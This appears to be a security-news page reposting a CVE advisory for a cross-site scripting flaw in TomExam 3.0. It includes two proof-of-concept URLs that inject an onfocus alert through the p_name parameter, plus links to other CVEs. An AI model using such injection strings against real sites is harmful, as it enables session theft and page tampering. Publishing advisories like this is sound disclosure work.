Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-34181: Cross Site Scripting (XSS) vulnerability in TomExam 3.0 via p_name parameter to list.thtml - mrhonest

Cross Site Scripting (XSS) vulnerability in TomExam 3.0 via p_name parameter to list.thtml.

CVE
#xss#vulnerability#auth

Cross Site Scripting (XSS) vulnerability in TomExam 3.0 via p_name parameter to list.thtml

An authenticated account is required

Login succeeded

user/paper/list.thtml?p_name=%22autofocus+onfocus%3D%22alert%281%29&p_cid=

user/paper/list.thtml?p_name=%22autofocus%20onfocus=%22alert(document.title)&p_cid=

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907